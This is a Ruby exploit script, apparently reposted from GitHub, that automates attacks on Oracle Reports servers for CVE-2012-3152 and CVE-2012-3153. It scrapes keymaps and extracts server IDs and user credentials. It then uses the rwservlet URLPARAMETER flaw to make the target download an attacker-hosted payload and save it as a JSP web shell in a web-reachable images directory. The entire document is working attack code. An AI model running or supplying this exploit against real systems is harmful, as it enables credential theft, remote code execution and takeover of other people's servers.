#!/usr/bin/env ruby

require 'uri'
require 'open-uri'
require 'openssl'

#OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE

def upload_payload(dest)
  url = "#{@url}/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/#{dest}/images/#{@payload_name}+JOBTYPE=rwurl+URLPARAMETER='#{@payload_url}'"
  #print url

  begin
    uri = URI.parse(url)
    html = uri.open.read
  rescue
    html = ""
  end

  if html =~ /Successfully run/
    @hacked = true
    print "[+] Payload uploaded!\n"
  else
    print "[-] Payload upload failed\n"
  end
end

def getenv(server, authid)
  print "[+] Found server: #{server}\n"
  print "[+] Found credentials: #{authid}\n"
  print " [*] Querying showenv ... \n"

  begin
    uri = URI.parse("#{@url}/reports/rwservlet/showenv?server=#{server}&authid=#{authid}")
    html = uri.open.read
  rescue
    html = ""
  end

  if html =~ /\/(.*)\/showenv/
    print "[+] Query succeeded, uploading payload ... \n"
    upload_payload($1)
  else
    print "[-] Query failed... \n"
  end
end

@payload_url = ""  # the url that holds our payload (we can execute .jsp on the server)
@url = ""          # url to compromise
@hacked = false
@payload_name = (0...8).map { ('a'..'z').to_a[rand(26)] }.join + ".jsp"

print " [*] PWNACLE Fusion - Mekanismen <mattias@gotroot.eu>\n"
print " [*] Automated exploit for CVE-2012-3152 / CVE-2012-3153\n"
print " [*] Credits to: @miss_sudo\n"

unless ARGV[0] and ARGV[1]
  print "[-] Usage: ./pwnacle.rb target_url payload_url\n"
  exit
end

@url = ARGV[0]
@payload_url = ARGV[1]

print " [*] Target URL: #{@url}\n"
print " [*] Payload URL: #{@payload_url}\n"
print " [*] Payload name: #{@payload_name}\n"

begin
  # Can we view keymaps?
  uri = URI.parse("#{@url}/reports/rwservlet/showmap")
  html = uri.open.read
rescue
  print "[-] URL not vulnerable or unreachable\n"
  exit
end

# Parse keymaps for servers
test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten

print " [*] Enumerating keymaps ... \n"

test.each do |t|
  if not @hacked
    t = t.delete(' ')
    url = "#{@url}/reports/rwservlet/parsequery?#{t}"

    begin
      uri = URI.parse(url)
      html = uri.open.read
    rescue
    end

    # to automate exploitation we need to query showenv for a local path
    # we need a server id and creds for this, so we enumerate the keymaps and hope for the best
    # showenv tells us the local PATH of /reports/ where we upload the shell
    # so we can reach it from /reports/images/<shell>.jsp
    if html =~ /userid=(.*)@/
      authid = $1
    end

    if html =~ /server=(\S*)/
      server = $1
    end

    if server and authid
      getenv(server, authid)
    end
  else
    break
  end
end

if @hacked
  print " [*] Server hopefully compromised!\n"
  print " [*] Payload url: #{@url}/reports/images/#{@payload_name}\n"
else
  print " [*] Enumeration done ... no vulnerable keymaps for automatic exploitation found \n"
  # server is still vulnerable but cannot be automatically exploited ... i guess
end

Sursa: https://github.com/Mekanismen/pwnacle-fusion/blob/master/pwnacle.rb